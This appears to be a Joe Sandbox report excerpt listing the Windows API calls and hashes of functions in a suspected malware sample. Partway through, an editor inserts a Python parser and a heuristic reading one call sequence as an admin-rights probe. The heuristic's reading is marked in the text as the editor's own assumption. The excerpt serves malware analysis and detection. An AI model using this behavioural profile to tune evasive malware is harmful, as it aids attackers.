                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3275902921-0
                                                                                                                                    • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                    • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                    • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                    • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 004554DF
                                                                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3691411573-0
                                                                                                                                    • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                    • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                    • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                    • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1814673581-0
                                                                                                                                    • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                    • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                    • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                    • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                    • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                    • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                    • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                    • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                    • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                    • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 372113273-0
                                                                                                                                    • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                    • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                    • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                    • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                    APIs
                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                    • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                    • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                    • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                    • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                    • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                    • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                    • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                    • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                    • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                      • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                    • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                    • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                    • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                    • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                    • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                    • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                    • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00436055
• LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
• UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
• GetLastError.KERNEL32 ref: 00436081
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
• String ID:
• API String ID: 1690418490-0
• Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
• Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
• Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
• Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
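The OpenSCManagerW / LockServiceDatabase / UnlockServiceDatabase / CloseServiceHandle sequence in the entry above is the kind of pattern worth pulling out of a long listing mechanically rather than by eye. The Python below is an added example by the editor, not code from the Joe Sandbox report or from the analysed sample: it parses "APIs" bullet lines in the shape this page uses into structured records, and flags the lock sequence when OpenSCManagerW is called with SC_MANAGER_LOCK (0x0008) in its third argument, dwDesiredAccess, which the listing shows as 00000008, and no service is opened, created or started. Reading that sequence as a probe for administrative rights (the lock right is refused to standard users, so the call's outcome tells the caller whether it is elevated) is the editor's interpretation and not a finding stated by the report. The sample text in the block is constructed from the lines above plus one "Part of subcall" line from a later entry.

```python
import re
from collections import Counter

# Constructed sample in the shape of the report's "APIs" bullet lines
# (the SCM sequence from the listing above plus one "Part of subcall" line).
SAMPLE_APIS = r"""
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00436055
• LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
• UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
• GetLastError.KERNEL32 ref: 00436081
• CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
"""

# One bullet line: optional "Part of subcall function XXXX:" prefix, then
# Function.MODULE(args) or Function.MODULE with no argument list, then "ref: addr".
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

SC_MANAGER_LOCK = 0x0008  # Win32 SCM access right needed for LockServiceDatabase


def base_name(func):
    """Strip the A/W suffix so OpenSCManagerW and OpenSCManagerA hit the same rule."""
    return func[:-1] if len(func) > 1 and func[-1] in "AW" else func


def parse_api_lines(text):
    """Turn report 'APIs' bullet lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Arguments are comma separated in the report; an argument that itself
        # contained a comma would be split here, so treat args as best effort.
        args = raw.split(",") if raw else []
        calls.append({
            "func": m.group("func"),
            "module": m.group("mod"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # None when the call is made directly
        })
    return calls


def is_ordered_subsequence(needle, haystack):
    """True if every item of needle occurs in haystack in the same order (gaps allowed)."""
    it = iter(haystack)
    return all(any(item == x for x in it) for item in needle)


def detect_scm_lock_probe(calls):
    """Heuristic (editor's assumption, see lead-in): OpenSCManager asked for
    SC_MANAGER_LOCK, the database is locked and unlocked, and no service is
    opened, created or started, i.e. the SCM is touched only to learn
    whether the caller holds the lock right (which standard users lack)."""
    names = [base_name(c["func"]) for c in calls]
    wanted = ["OpenSCManager", "LockServiceDatabase",
              "UnlockServiceDatabase", "CloseServiceHandle"]
    if not is_ordered_subsequence(wanted, names):
        return False
    if any(n.startswith(("OpenService", "StartService", "CreateService")) for n in names):
        return False
    for c in calls:
        if base_name(c["func"]) != "OpenSCManager":
            continue
        try:
            access = int(c["args"][2], 16)  # dwDesiredAccess is the third parameter
        except (IndexError, ValueError):
            continue  # argument missing or shown as "?" in the report
        if access & SC_MANAGER_LOCK:
            return True
    return False


def modules_used(calls):
    """Count calls per module, a quick way to see what a function leans on."""
    return Counter(c["module"] for c in calls)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    print(f"{len(parsed)} calls, modules: {dict(modules_used(parsed))}")
    print("SCM lock probe:", detect_scm_lock_probe(parsed))
```

The access-right check matters: OpenSCManager with SC_MANAGER_CONNECT alone succeeds for any user, so a LockServiceDatabase call without the lock bit requested would fail for everyone and tells the caller nothing; the rule only fires when the bit the listing shows (00000008) is actually present.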
APIs
  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
• CoInitialize.OLE32(00000000), ref: 00475B71
• CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
• CoUninitialize.OLE32 ref: 00475D71
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk$HH
• API String ID: 886957087-3121654589
• Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
• Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
• Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
• Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
• Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
• Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
• SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID: ComboBox$ListBox
• API String ID: 763830540-1403004172
• Opcode ID: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
• Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
• Opcode Fuzzy Hash: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
• Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
APIs
• GetStdHandle.KERNEL32(?), ref: 004439B4
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
